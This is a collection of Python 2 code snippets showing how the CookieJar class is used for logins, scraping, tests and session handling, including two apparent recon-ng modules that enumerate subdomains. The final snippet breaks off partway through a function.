Example #1
0
def get_opener():
    global OPENER
    if OPENER:
        return OPENER
    cj = CookieJar()
    ck = Cookie(
        version=0,
        name="Locale",
        value="Russian",
        port=None,
        port_specified=False,
        domain="acm.timus.ru",
        domain_specified=False,
        domain_initial_dot=False,
        path="/",
        path_specified=True,
        secure=False,
        expires=None,
        discard=True,
        comment=None,
        comment_url=None,
        rest={"HttpOnly": None},
        rfc2109=False,
    )
    cj.set_cookie(ck)
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    data = urllib.urlencode({"Action": "edit", "JudgeID": JUDGE_ID, "Password": PASSWORD})
    response = opener.open(AUTH_URL, data)
    OPENER = opener
    return opener
Example #2
0
def _doPOST(action=None, extra_headers=None, args=None, url=API_URL, host=HOST):
    body = ACTION_REQUEST_MAPPING.get(action, None)
    if not body:
        print "Unable to find the request data for the action %s" %action
        sys.exit(1)
    body = body % args
    
    headers={
        'Host' : host,
        'Accept-Encoding' : 'deflate',
        'Content-Length' : len(body),
        'User-Agent' : '"Mozilla/5.0 (Windows; U; Windows NT 6.1; pl; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)',
    }
    if extra_headers:
        headers.update(extra_headers)
    
    request = urllib2.Request(url, body, headers)
    try:
        response = urllib2.urlopen(request)
        cookies = CookieJar()
        cookies.extract_cookies(response, request)
        cookie_handler= urllib2.HTTPCookieProcessor( cookies )
        redirect_handler= urllib2.HTTPRedirectHandler()
        opener = urllib2.build_opener(redirect_handler, cookie_handler)
        resp = opener.open(request)
        return resp.read()
    except urllib2.HTTPError, e:
        print >> sys.stderr, "National Rail servers having some trouble - ", e
        raise e
Example #3
0
def _doPOST(POST_DATA=LOGIN_POST_DATA, extra_headers=META_HEADERS, args=None, url=LOGIN_URL, cookies=None):
    """
    Method to login to sky
    """
    body = ''
    if POST_DATA:
        body = '&'.join([k+'='+v for k,v in POST_DATA.items()]) % args
    
    headers={
        'Accept-Encoding' : 'deflate',
        'Content-Length' : len(body),
    }
    if extra_headers:
        headers.update(extra_headers)
    
    request = urllib2.Request(url, body, headers)
    try:
        response = urllib2.urlopen(request)
        if not cookies:
            cookies = CookieJar()
            cookies.extract_cookies(response, request)
        cookie_handler= urllib2.HTTPCookieProcessor(cookies)
        redirect_handler= urllib2.HTTPRedirectHandler()
        opener = urllib2.build_opener(redirect_handler, cookie_handler)
        resp = opener.open(request)
        return cookies, resp.read()
    except urllib2.HTTPError, e:
        print >> sys.stderr, "Sky servers having some trouble - ", e
        raise e
Example #4
0
    def extract_cookiejar(self):
        """
        Extract cookies that pycurl instance knows.

        Returns `CookieJar` object.
        """

        # Example of line:
        # www.google.com\tFALSE\t/accounts/\tFALSE\t0\tGoogleAccountsLocale_session\ten
        # Fields:
        # * domain
        # * whether or not all machines under that domain can read the cookie's information.
        # * path
        # * Secure Flag: whether or not a secure connection (HTTPS) is required to read the cookie.
        # * exp. timestamp
        # * name
        # * value
        cookiejar = CookieJar()
        for line in self.curl.getinfo(pycurl.INFO_COOKIELIST):
            values = line.split('\t')
            # old
            #cookies[values[-2]] = values[-1]
            # new
            cookie = create_cookie(
                name=values[5],
                value=values[6],
                domain=values[0],
                path=values[2],
                secure=values[3] == "TRUE",
                expires=int(values[4]) if values[4] else None,
            )
            cookiejar.set_cookie(cookie)
        return cookiejar
Example #5
0
    def test_cookie_store(self):
        cj = CookieJar()
        test_email = "*****@*****.**"
        test_cookies = [Cookie(version=0, name='Name', value='1',
                               port=None, port_specified=False,
                               domain='www.example.com',
                               domain_specified=False,
                               domain_initial_dot=False,
                               path='/', path_specified=True, secure=False,
                               expires=None,
                               discard=True, comment=None, comment_url=None,
                               rest={'HttpOnly': None},
                               rfc2109=False)]
        for c in test_cookies:
            cj.set_cookie(c)
        x = Credentials(id=test_email)
        cookie_list = [c for c in cj]
        x.cookies = cookie_list
        x.put()

        y = Credentials.get_by_id(test_email)
        self.assertIsNotNone(y)
        self.assertEquals(y.key.id(), test_email)
        stored_credentials_dict = [sc.__dict__ for sc in y.cookies]
        self.assertEquals(stored_credentials_dict,
                          [sc.__dict__ for sc in test_cookies])
Example #6
0
 def module_run(self, domains):
     base_url = 'https://www.bing.com/search'
     cnt = 0
     new = 0
     for domain in domains:
         self.heading(domain, level=0)
         base_query = 'domain:' + domain
         pattern = '"b_algo"><h2><a href="(?:\w*://)*(\S+?)\.%s[^"]*"' % (domain)
         subs = []
         # control variables
         new = True
         page = 0
         nr = 50
         cookiejar = CookieJar()
         cookiejar.set_cookie(self.make_cookie('SRCHHPGUSR', 'NEWWND=0&NRSLT=%d&SRCHLANG=&AS=1' % (nr), '.bing.com'))
         # execute search engine queries and scrape results storing subdomains in a list
         # loop until no new subdomains are found
         while new == True:
             content = None
             query = ''
             # build query based on results of previous results
             for sub in subs:
                 query += ' -domain:%s.%s' % (sub, domain)
             full_query = base_query + query
             url = '%s?first=%d&q=%s' % (base_url, (page*nr), urllib.quote_plus(full_query))
             # bing errors out at > 2059 characters not including the protocol
             if len(url) > 2066: url = url[:2066]
             self.verbose('URL: %s' % (url))
             # send query to search engine
             resp = self.request(url, cookiejar=cookiejar)
             if resp.status_code != 200:
                 self.alert('Bing has encountered an error. Please submit an issue for debugging.')
                 break
             content = resp.text
             sites = re.findall(pattern, content)
             # create a unique list
             sites = list(set(sites))
             new = False
             # add subdomain to list if not already exists
             for site in sites:
                 if site not in subs:
                     subs.append(site)
                     new = True
                     host = '%s.%s' % (site, domain)
                     self.output('%s' % (host))
                     new += self.add_hosts(host)
             if not new:
                 # exit if all subdomains have been found
                 if not '>Next</a>' in content:
                     break
                 else:
                     page += 1
                     self.verbose('No New Subdomains Found on the Current Page. Jumping to Result %d.' % ((page*nr)+1))
                     new = True
             # sleep script to avoid lock-out
             self.verbose('Sleeping to avoid lockout...')
             time.sleep(random.randint(5,15))
         cnt += len(subs)
     self.summarize(new, cnt)
Example #7
0
    def cookiejar(self):
        cookiejar = CookieJar()
        for domain, items in self._cookie.items():
            for path, names in items.items():
                for name, cookie in names.items():
                    cookiejar.set_cookie(cookie)

        return cookiejar
Example #8
0
 def clear(self, domain=None, path=None, name=None):
   if issubclass(CookieJar, object):
     super(KeyringCookieJar, self).clear(domain, path, name)
   else:
     # old-style class in Python 2
     CookieJar.clear(self, domain, path, name)
   self.nuke()
   self.save()
Example #9
0
  def __init__(self, svc=DEFAULT_SERVICE, acct=None,
      delayload=False, policy=None):

    CookieJar.__init__(self, policy)
    self.svc = "Cookies for " + svc
    self.acct = getpass.getuser() if acct is None else acct
    self.delayload = bool(delayload)

    if not self.delayload: self.load()
Example #10
0
    def __init__(self, token=None):
        CookieJar.__init__(self)

        if token:
            parts = token.split("_")
            if len(parts) == 2:
                crowd, stat = parts
                self.make_cookie(self.CROWD_COOKIE, crowd)
                self.make_cookie(self.STAT_COOKIE, stat)
Example #11
0
def extract_request_cookies(req):
    jar = CookieJar()
    host = urlparse.urlsplit(req.host_url).hostname
    for k, v in req.str_cookies.iteritems():
        yield jar._cookie_from_cookie_tuple(
            (k, v,
             {"domain": host,
              "path": "/"},
             {}), None)
Example #12
0
class Browser(object):
    def __init__(self, base_url):
        self.cookie_jar = CookieJar()
        self.opener = build_opener(HTTPCookieProcessor(self.cookie_jar))
        self.base_url = base_url

    def open(self, url, **kwargs):
        if '_raw' in kwargs: _raw = kwargs['_raw']; del kwargs['_raw']
        else: _raw = False
        if '_is_json' in kwargs: _is_json = kwargs['_is_json']; del kwargs['_is_json']
        else: _is_json = True
        url = urljoin(self.base_url, url)
        data = urlencode(kwargs).encode()
        headers = {
            u"Content-Type" : u"application/x-www-form-urlencoded",
        }

        req = Request(url, data, headers)
        res = self.opener.open(req)

        with closing(res) as fp:
            content = fp.read()

        content = content.decode()

        if not _raw:
            content = json.loads(content)

        return res, content

    def set_cookie(self, name, value):
        url = urlparse(self.base_url)
        cookie = Cookie(
            version=0,
            name=name,
            value=value,
            port=None,
            port_specified=False,
            domain=url.netloc,
            domain_specified=False,
            domain_initial_dot=False,
            path=url.path,
            path_specified=True,
            secure=False,
            expires=sys.maxsize,
            discard=False,
            comment=None,
            comment_url=None,
            rest={},
            rfc2109=False,
        )

        self.cookie_jar.set_cookie(cookie)

    def __getitem__(self, url):
        return functools.partial(self.open, url)
Example #13
0
 def __init__(self, cookiestring='', policy=None):
     CookieJar.__init__(self, policy)
     self.cookiestring = cookiestring
     if not cookiestring:
         return
     f = StringIO.StringIO(cookiestring)
     try:
         self._really_load(f, '[No file. Content loaded from string]', False, False)
     finally:
         f.close()
 def cookies(self):
     jar = CookieJar()
     if self.settings:
         jar.set_cookie(Cookie(
             version=0, name='settings',
             value=urllib.quote(phpserialize.serialize(self.settings)),
             port=None, port_specified=False, domain='mediapoisk.info',
             domain_specified=True, domain_initial_dot=True, path='/', path_specified=True, secure=False,
             expires=None, discard=True, comment=None, comment_url=None, rest=None, rfc2109=True
             ))
     return jar
Example #15
0
    def test_cookiejar(self):
        c1 = create_cookie('foo', 'bar')
        c2 = create_cookie('foo', 'bar')
        self.assertFalse(c1 == c2)

        c = create_cookie('foo', 'bar', domain='.dumpz.org')
        self.assertEquals(c.domain, '.dumpz.org')

        cj = CookieJar()
        cj.set_cookie(create_cookie('foo', 'bar', domain='foo.com'))
        cj.set_cookie(create_cookie('foo', 'bar', domain='bar.com'))
        self.assertEqual(len(cj), 2)
Example #16
0
def request(url, data=None, headers={}, cookies={}, auth=None):
 if cookies:
  headers['Cookie'] = '; '.join(urllib.quote(k) + '=' + urllib.quote(v) for (k, v) in cookies.iteritems())
 request = urllib2.Request(url.encode('utf8'), data, headers)
 manager = urllib2.HTTPPasswordMgrWithDefaultRealm()
 if auth:
  manager.add_password(None, request.get_full_url(), auth[0], auth[1])
 opener = urllib2.build_opener(urllib2.HTTPBasicAuthHandler(manager), urllib2.HTTPDigestAuthHandler(manager))
 response = opener.open(request)
 cj = CookieJar()
 cj.extract_cookies(response, request)
 return HttpResponse(response.read(), response.info().headers, dict((c.name, c.value) for c in cj))
Example #17
0
    def __init__(self, cookieStr=None, delayload=True, policy=None):
        """
        Cookies are NOT loaded from the named file until either the .load() or
        .revert() method is called.

        """
        CookieJar.__init__(self, policy)
        if cookieStr is not None:
            if 1:
                cookieStr+""
                self.load(cookieStr)
            else:
                raise ValueError("cookieStr must be string-like")
Example #18
0
def getCurrentUsage(username, password):
    url = "https://cyberstore.tpg.com.au/your_account/index.php?function=checkaccountusage"

    data = {}
    values = {'check_username': username, 'password': password}

    data = urllib.urlencode(values)
    request = urllib2.Request(url, data)

    try:
        response = urllib2.urlopen(request)
    except:
        print("ERROR: Could not retrieve TPG website...");
        raise

    cookies = CookieJar()
    cookies.extract_cookies(response, request)
    cookie_handler = urllib2.HTTPCookieProcessor(cookies)
    redirect_handler = urllib2.HTTPRedirectHandler()
    opener = urllib2.build_opener(redirect_handler,cookie_handler)

    try:
        response = opener.open(request)
    except:
        print("ERROR: Could not retrieve account usage website...");
        raise

    the_page = response.read()


    # For accounts that count upload and download
    found = re.search('(<BR>Peak\ Downloads\ used:\ )(.+)( MBPeak\ Uploads\ used:\ )(.+)( MBPeak Total used: )(.+)( MB<br>Off-Peak Downloads used: )(.+)( MB<br>Off-Peak Uploads used: )(.+)( MBOff-Peak Total used: )(.+)( MB</td>)', the_page)
    if found:
        onpeak_downloads_used = found.group(2)
        onpeak_uploads_used = found.group(4)
        onpeak_used = found.group(6)
        offpeak_downloads_used = found.group(8)
        offpeak_uploads_used = found.group(10)
        offpeak_used = found.group(12)
        return float(onpeak_used), float(offpeak_used)

    # For accounts that only count download
    found = re.search('(<BR>Peak\ Downloads\ used:\ )(.+)( MB<br>Off-Peak Downloads used: )(.+)( MB</td>)', the_page)
    if found:
        onpeak_used = found.group(2)
        offpeak_used = found.group(4)
        return float(onpeak_used), float(offpeak_used)

    print("ERROR: Could not find quota information in returned site. Check login details.");
    #print(the_page)
    raise
Example #19
0
 def module_run(self, domains):
     url = 'http://searchdns.netcraft.com/'
     pattern = '<td align\=\"left\">\s*<a href=\"http://(.*?)/"'
     # answer challenge cookie
     cookiejar = CookieJar()
     payload = {'restriction': 'site+ends+with', 'host': 'test.com'}
     resp = self.request(url, payload=payload, cookiejar=cookiejar)
     cookiejar = resp.cookiejar
     for cookie in cookiejar:
         if cookie.name == 'netcraft_js_verification_challenge':
             challenge = cookie.value
             response = hashlib.sha1(urllib.unquote(challenge)).hexdigest()
             cookiejar.set_cookie(self.make_cookie('netcraft_js_verification_response', '%s' % response, '.netcraft.com'))
             break
     cnt = 0
     new = 0
     for domain in domains:
         self.heading(domain, level=0)
         payload['host'] = domain
         subs = []
         # execute search engine queries and scrape results storing subdomains in a list
         # loop until no Next Page is available
         while True:
             self.verbose('URL: %s?%s' % (url, urllib.urlencode(payload)))
             resp = self.request(url, payload=payload, cookiejar=cookiejar)
             content = resp.text
             sites = re.findall(pattern, content)
             # create a unique list
             sites = list(set(sites))
             # add subdomain to list if not already exists
             for site in sites:
                 if site not in subs:
                     subs.append(site)
                     self.output('%s' % (site))
                     new += self.add_hosts(site)
             # verifies if there's more pages to look while grabbing the correct 
             # values for our payload...
             link = re.findall(r'(\blast\=\b|\bfrom\=\b)(.*?)&', content)
             if not link:
                 break
             else:
                 payload['last'] = link[0][1]
                 payload['from'] = link[1][1]
                 self.verbose('Next page available! Requesting again...' )
                 # sleep script to avoid lock-out
                 self.verbose('Sleeping to Avoid Lock-out...')
                 time.sleep(random.randint(5,15))
         cnt += len(subs)
     self.summarize(new, cnt)
Example #20
0
 def module_run(self, domains):
     url = "http://searchdns.netcraft.com/"
     pattern = '<td align\="left">\s*<a href="http://(.*?)/"'
     # answer challenge cookie
     cookiejar = CookieJar()
     payload = {"restriction": "site+ends+with", "host": "test.com"}
     resp = self.request(url, payload=payload, cookiejar=cookiejar)
     cookiejar = resp.cookiejar
     for cookie in cookiejar:
         if cookie.name == "netcraft_js_verification_challenge":
             challenge = cookie.value
             response = hashlib.sha1(urllib.unquote(challenge)).hexdigest()
             cookiejar.set_cookie(
                 self.make_cookie("netcraft_js_verification_response", "%s" % response, ".netcraft.com")
             )
             break
     for domain in domains:
         self.heading(domain, level=0)
         payload["host"] = domain
         subs = []
         # execute search engine queries and scrape results storing subdomains in a list
         # loop until no Next Page is available
         while True:
             self.verbose("URL: %s?%s" % (url, encode_payload(payload)))
             resp = self.request(url, payload=payload, cookiejar=cookiejar)
             content = resp.text
             sites = re.findall(pattern, content)
             # create a unique list
             sites = list(set(sites))
             # add subdomain to list if not already exists
             for site in sites:
                 if site not in subs:
                     subs.append(site)
                     self.output("%s" % (site))
                     self.add_hosts(site)
             # verifies if there's more pages to look while grabbing the correct
             # values for our payload...
             link = re.findall(r"(\blast\=\b|\bfrom\=\b)(.*?)&", content)
             if not link:
                 break
             else:
                 payload["last"] = link[0][1]
                 payload["from"] = link[1][1]
                 self.verbose("Next page available! Requesting again...")
                 # sleep script to avoid lock-out
                 self.verbose("Sleeping to Avoid Lock-out...")
                 time.sleep(random.randint(5, 15))
         if not subs:
             self.output("No results found.")
def get_country_index():
    for country in range(1,999):
        jar = CookieJar()
        req = Request(URL_SEARCH, urlencode({'country': country}))
        res = urlopen(req)
        jar.extract_cookies(res, req)
        for page in count(1):
            req = Request(URL % (country, page))
            jar.add_cookie_header(req)
            doc = html.parse(urlopen(req))
            anchors = list(doc.findall('//table[@id="searchResultsTable"]/tbody//a'))
            for a in anchors:
                get_entry(urljoin(URL, a.get('href')))
            if doc.find('//span[@class="pagelinks"]/a/img[@alt="Next"]') is None:
                break
Example #22
0
def test_cookielib_compatibility():
    cj = CookieJar()
    # Set time in order to be still valid in some years, when cookie strings expire
    cj._now = cj._policy._now = time.mktime((2012, 1, 1, 0, 0, 0, 0, 0, 0))

    request = Request('http://test.com')
    parser = HTTPResponse()
    parser.feed(MULTI_COOKIE_RESPONSE)
    cookies = cj.make_cookies(parser, request)
    # Don't use extract_cookies directly, as time can not be set there manually for testing
    for cookie in cookies:
        if cj._policy.set_ok(cookie, request):
            cj.set_cookie(cookie)
    # Three valid, not expired cookies placed
    assert len(list(cj)) == 3
def get_cookies_from_response(url):
    cookiejar = CookieJar()

    opener = urllib2.build_opener(
        urllib2.HTTPCookieProcessor(cookiejar))
    opener.open(url)

    # add a new cookie or replace a old one
    newcookie = make_cookie('newcookie', '11111', '.baidu.com', '/')

    # remove a cookie
    cookiejar.set_cookie(newcookie)
    cookiejar.clear('.baidu.com', '/', 'newcookie')

    return cookiejar
Example #24
0
class Wypok(object):
    def __init__(self, cookies):
        self.cj = CookieJar()
        for i in json.loads(cookies):
            c = Cookie(
                None,
                i["name"],
                i["value"],
                "80",
                "80",
                i["domain"],
                None,
                None,
                i["path"],
                None,
                i["secure"],
                time() + (60 * 60 * 60 * 24 * 365),
                "TestCookie",
                None,
                None,
                None,
            )
            self.cj.set_cookie(c)

    def get(self, url):
        r = requests.get(url, cookies=self.cj)
        return r.content

    def entries(self, url):

        ht = self.get(url)
        soup = BeautifulSoup(ht, "html.parser")
        ret = []
        for i in soup.find_all("li", class_=re.compile("link")):
            t = i.find("h2").text.strip()
            link = i.find("h2").find("a").get("href")
            desc = i.find("p", class_="text").text.strip()
            tags = []
            for j in i.find_all("a", class_="tag"):
                if "unhide" not in j.attrs["class"]:
                    tags.append(j.text.strip().lstrip("#"))

            wykopUrl = i.find("div", class_="diggbox").find("a").get("href")

            if not "partner" in wykopUrl and ("voteUp" in wykopUrl or "voteRemove" in wykopUrl):
                ret.append(Znalezisko(t, desc, link, wykopUrl, tags, handle=self))

        return ret
Example #25
0
	def __init__(self, base, user = None, password = None, forget = False,
			skip_auth = False, httpuser = None, httppassword = None ):
		"""
		{user} and {password} will be prompted if an action needs them
		and they are not supplied.

		if {forget} is set, the login cookie will be destroyed on quit.

		@param base: base url of the bugzilla
		@type  base: string
		@keyword user: username for authenticated actions.
		@type    user: string
		@keyword password: password for authenticated actions.
		@type    password: string
		@keyword forget: forget login session after termination.
		@type    forget: bool
		@keyword skip_auth: do not authenticate
		@type    skip_auth: bool
		"""
		self.base = base
		scheme, self.host, self.path, query, frag  = urlsplit(self.base)
		self.authenticated = False
		self.forget = forget

		if not self.forget:
			try:
				cookie_file = os.path.join(os.environ['HOME'], COOKIE_FILE)
				self.cookiejar = LWPCookieJar(cookie_file)
				if forget:
					try:
						self.cookiejar.load()
						self.cookiejar.clear()
						self.cookiejar.save()
						os.chmod(self.cookiejar.filename, 0700)
					except IOError:
						pass
			except KeyError:
				self.warn('Unable to save session cookies in %s' % cookie_file)
				self.cookiejar = CookieJar(cookie_file)
		else:
			self.cookiejar = CookieJar()

		self.opener = build_opener(HTTPCookieProcessor(self.cookiejar))
		self.user = user
		self.password = password
		self.httpuser = httpuser
		self.httppassword = httppassword
		self.skip_auth = skip_auth
Example #26
0
def qq_friends(request):
    for k in request.POST:
        print '%s : %s' % (k, request.POST[k])
    verifysession = request.COOKIES['verifysession']
    print verifysession
    headers = {'Cookie':'''verifysession=%s''' % verifysession,
               'Content-Type':'application/x-www-form-urlencoded',
               'Referer':'http://mail.qq.com/',
               'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1',
               }
    data = urlencode(request.POST)
    login_request = Request('http://%s.mail.qq.com/cgi-bin/login?sid=0,2,zh_CN' % server_no, data, headers)
    result = urlopen(login_request)
    content = result.read()
    login_error = login_error_re.search(content)
    if login_error:
        error_no = login_error.group(1) #1:password wrong 2: captcha wrong
        if error_no == '1':
            error_msg = 'password or qq wrong'
        elif error_no == '2':
            error_msg = 'captcha wrong'
        return render_to_response('friends.html', locals())
    sid = login_succ_re.search(content).group(1)
        
    friends_list_headers = {'Referer':'http://mail.qq.com/',
                           'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1',
                           }
    friends_list_request = Request('http://%s.mail.qq.com/cgi-bin/addr_listall?sid=%s&sorttype=null&category=common' % (server_no, sid), headers = friends_list_headers)
    cj = CookieJar()
    cj.extract_cookies(result, friends_list_request)
    opener = build_opener(HTTPCookieProcessor(cj))
    result = opener.open(friends_list_request)
    grouplist = hacked_friendlist_page_re.search(result.read().decode('gb2312', 'ignore')).group(0)
    soup = BeautifulSoup(grouplist, fromEncoding = 'utf-8')
    grouplist = soup.findAll('li')
    friend_list = {}
    for group in grouplist:
        friend_list[group.a.string] = []
        list_request = Request('http://%s.mail.qq.com%s' % (server_no, group.a['href']), headers = friends_list_headers)
        result = opener.open(list_request)
        body = BeautifulSoup(body_re.search(result.read().decode('gb2312', 'ignore')).group(0), fromEncoding = 'utf-8')
        friends = body.findAll('div', attrs={'class':'M'})
        for friend in friends:
            friend_name = unescape(friend.p.span.contents[1].replace('&nbsp;', '', 1))
            friend_email = friend.p.img['addr']
            friend_list[group.a.string].append((friend_name, friend_email))
    
    return render_to_response('friends.html', locals())
Example #27
0
def request(url, data=None, headers={}, cookies={}, auth=None, returnHeaders=False):
 cookieHeader = cookieencode(cookies)
 if cookieHeader:
  headers['Cookie'] = cookieHeader
 request = urllib2.Request(url, data, headers)
 manager = urllib2.HTTPPasswordMgrWithDefaultRealm()
 if auth:
  manager.add_password(None, request.get_full_url(), auth[0], auth[1])
 opener = urllib2.build_opener(urllib2.HTTPBasicAuthHandler(manager), urllib2.HTTPDigestAuthHandler(manager))
 response = opener.open(request)
 if returnHeaders:
  cj = CookieJar()
  cj.extract_cookies(response, request)
  return response.read(), response.info().headers, dict((c.name, c.value) for c in cj)
 else:
  return response.read()
Example #28
0
    def __init__(self, username=None, password=None,
                 debug=False, naptime=True,
                 user_agent=DEFAULT_USER_AGENT):
        self.sleep_after_request = naptime
        self.user_agent = user_agent
        self.debug = debug

        # Try setting the username from args
        self.username = username
        self.password = password
        self.logged_in = False

        self.cookie_jar = CookieJar()
        if self.debug:
            # Noisy HTTPS handler for debugging
            self.url_opener = build_opener(
                HTTPCookieProcessor(self.cookie_jar),
                HTTPSHandler(debuglevel=1))
        else:
            self.url_opener = build_opener(
                HTTPCookieProcessor(self.cookie_jar))

        self.url_opener.addheaders = [
            ('User-Agent', self.user_agent)
        ]

        logging.info('Downloader intialized.')
Example #29
0
 def __init__(self):
     '''
     Constructor. It delegates construction to the base class
     L{HttxObject} and initializes the member variables
     '''
     HttxObject.__init__(self)
     self.cookiejar = CookieJar()
Example #30
0
 def __read_cj(self):
     MAX_EPS = 86400 #24 hours
     if os.path.exists("cookiejar.dat"):
         modtime = os.stat("cookiejar.dat").st_mtime
         if time.time() - modtime > MAX_EPS:
             return None
         else:
             dd = pickle.load(open("cookiejar.dat", "r"))
             cj =  CookieJar()
             for c in dd["cookies"]:
                 cj.set_cookie(c)
             self.__uid = dd["uid"]
             self.__nickname = dd["nick"]
             return cj
     else:
         return None
Example #31
0
 def get_fresh(self):
     cook = CookieJar()
     agnt = CookieAgent(Agent(reactor), cook)
     return cook, agnt
Example #32
0
    def __init__(self, name=None, project=None, lang=None, base_url=None,
                 article_path=None, script_path=None, sql=None,
                 namespaces=None, login=(None, None), cookiejar=None,
                 user_agent=None, use_https=False, assert_edit=None,
                 maxlag=None, wait_between_queries=2, logger=None,
                 search_config=None):
        """Constructor for new Site instances.

        This probably isn't necessary to call yourself unless you're building a
        Site that's not in your config and you don't want to add it - normally
        all you need is wiki.get_site(name), which creates the Site for you
        based on your config file and the sites database. We accept a bunch of
        kwargs, but the only ones you really "need" are *base_url* and
        *script_path*; this is enough to figure out an API url. *login*, a
        tuple of (username, password), is highly recommended. *cookiejar* will
        be used to store cookies, and we'll use a normal CookieJar if none is
        given.

        First, we'll store the given arguments as attributes, then set up our
        URL opener. We'll load any of the attributes that weren't given from
        the API, and then log in if a username/pass was given and we aren't
        already logged in.
        """
        # Attributes referring to site information, filled in by an API query
        # if they are missing (and an API url can be determined):
        self._name = name
        self._project = project
        self._lang = lang
        self._base_url = base_url
        self._article_path = article_path
        self._script_path = script_path
        self._namespaces = namespaces

        # Attributes used for API queries:
        self._use_https = use_https
        self._assert_edit = assert_edit
        self._maxlag = maxlag
        self._wait_between_queries = wait_between_queries
        self._max_retries = 6
        self._last_query_time = 0
        self._api_lock = Lock()
        self._api_info_cache = {"maxlag": 0, "lastcheck": 0}

        # Attributes used for SQL queries:
        if sql:
            self._sql_data = sql
        else:
            self._sql_data = {}
        self._sql_conn = None
        self._sql_lock = Lock()
        self._sql_info_cache = {"replag": 0, "lastcheck": 0, "usable": None}

        # Attribute used in copyright violation checks (see CopyrightMixIn):
        if search_config:
            self._search_config = search_config
        else:
            self._search_config = {}

        # Set up cookiejar and URL opener for making API queries:
        if cookiejar is not None:
            self._cookiejar = cookiejar
        else:
            self._cookiejar = CookieJar()
        if not user_agent:
            user_agent = constants.USER_AGENT  # Set default UA
        self._opener = build_opener(HTTPCookieProcessor(self._cookiejar))
        self._opener.addheaders = [("User-Agent", user_agent),
                                   ("Accept-Encoding", "gzip")]

        # Set up our internal logger:
        if logger:
            self._logger = logger
        else:  # Just set up a null logger to eat up our messages:
            self._logger = getLogger("earwigbot.wiki")
            self._logger.addHandler(NullHandler())

        # Get all of the above attributes that were not specified as arguments:
        self._load_attributes()

        # If we have a name/pass and the API says we're not logged in, log in:
        self._login_info = name, password = login
        if name and password:
            logged_in_as = self._get_username_from_cookies()
            if not logged_in_as or name.replace("_", " ") != logged_in_as:
                self._login(login)
Example #33
0
#!/usr/bin/python

import urllib
import urllib2
import re
from cookielib import CookieJar
import sys

cj = CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))


def main():
    _, username, password = sys.argv
    fd1 = opener.open("http://www.google.com")
    metaLine = [l for l in fd1 if '<META HTTP-EQUIV="Refresh"' in l][0]
    if "login.tikona.in" not in metaLine:
        return
    url1 = metaLine[metaLine.index('URL=') + 4:-3]
    print "Step #1: Done"
    fd2 = opener.open(url1)
    #print fd2.read()
    url2 = opener.open(
        urllib2.Request(
            "https://login.tikona.in/userportal/" +
            "login.do?requesturi=http%3A%2F%2Fwww.google.com%2F&act=null", ""))
    print "Step #2: Done"
    #print url2.read()
    url2 = opener.open(
        urllib2.Request(
            "https://login.tikona.in/userportal/newlogin.do?phone=0",
        return False
    else:
        return True


# Import user created settings. This will override built-in settings if defined.
if module_exists("config"):
    import config
else:
    print(
        "Please set up the config.py file. Copy 'sample.config.py' to 'config.py' and set up options"
    )
    sys.exit(2)

# Initialize cookie jar and session
cookies = CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookies))

print("Load login page")

### Load the login page. This will initialize some cookies. Save them.
login_page = opener.open(
    'https://disneyworld.disney.go.com/login/?returnUrl=https://mydisneyphotopass.disney.go.com/'
)
# cookies are automatically saved.

# grab the unique CSRF key. parse it.
csrf_key = re.search('id="pep_csrf" value=".*"', login_page.read())
csrf_key = csrf_key.group(0)
csrf_key = string.split(csrf_key, "\"")  # split on double quote. easiest way.
csrf_key = csrf_key[
Example #35
0
class Network(DOMMixin):

    capabilities = [
        'cookies',
        'headers',
        ]

    wait_expression = WaitExpression

    user_agent = {
        'browser': 'network',
        'platform': 'python',
        'version': '1.0',
        }

    def __init__(self, base_url=None):
        # accept additional request headers?  (e.g. user agent)
        self._base_url = base_url
        self.reset()

    def open(self, url, wait_for=None, timeout=0):
        """Open web page at *url*."""
        self._open(url)

    def reset(self):
        self._referrer = None
        self._request_environ = None
        self._cookie_jar = CookieJar()
        self._opener = urllib2.build_opener(
            urllib2.HTTPCookieProcessor(self._cookie_jar)
        )
        self.status_code = 0
        self.status = ''
        self.response = None
        self.location = None
        self.headers = ()

    def wait_for(self, condition, timeout=None):
        pass

    def sync_document(self):
        """The document is always synced."""

    _sync_document = DOMMixin.sync_document

    @property
    def cookies(self):
        if not (self._cookie_jar and self.location):
            return {}
        request = urllib2.Request(self.location)
        policy = self._cookie_jar._policy

        # return ok will only return a cookie if the following attrs are set
        # correctly => # "version", "verifiability", "secure", "expires",
        # "port", "domain"
        return dict((c.name, c.value.strip('"'))
            for c in self._cookie_jar if policy.return_ok(c, request))

    def set_cookie(self, name, value, domain=None, path=None,
                   session=True, expires=None, port=None):
#        Cookie(version, name, value, port, port_specified,
#                 domain, domain_specified, domain_initial_dot,
#                 path, path_specified, secure, expires,
#                 discard, comment, comment_url, rest,
#                 rfc2109=False):

        cookie = Cookie(0, name, value, port, bool(port),
                        domain or '', bool(domain),
                        (domain and domain.startswith('.')),
                        path or '', bool(path), False, expires,
                        session, None, None, {}, False)
        self._cookie_jar.set_cookie(cookie)

    def delete_cookie(self, name, domain=None, path=None):
        try:
            self._cookie_jar.clear(domain, path, name)
        except KeyError:
            pass

    # Internal methods
    @lazy_property
    def _lxml_parser(self):
        return html_parser_for(self, wsgi_elements)

    def _open(self, url, method='GET', data=None, refer=True,
              content_type=None):
        before_browser_activity.send(self)
        open_started = time()

        if data:
            data = urlencode(data)

        url = urljoin(self._base_url, url)
        if method == 'GET':
            if '?' in url:
                url, query_string = url.split('?', 1)
            else:
                query_string = None

            if data:
                query_string = data
            if query_string:
                url = url + '?' + query_string

            request = urllib2.Request(url)
        elif method == 'POST':
            request = urllib2.Request(url, data)
        else:
            raise Exception('Unsupported method: %s' % method)
        if self._referrer and refer:
            request.add_header('Referer', self._referrer)

        logger.info('%s(%s)', url, method)
        request_started = time()

        response = self._opener.open(request)

        request_ended = time()

        self.status_code = response.getcode()
        self.headers = Headers(
            (head.strip().split(': ',1) for head in response.info().headers)
        )
        self._referrer = request.get_full_url()
        self.location = response.geturl()
        self._response = response
        self.response = ''.join(list(response))
        self._sync_document()

        open_ended = time()
        request_time = request_ended - request_started

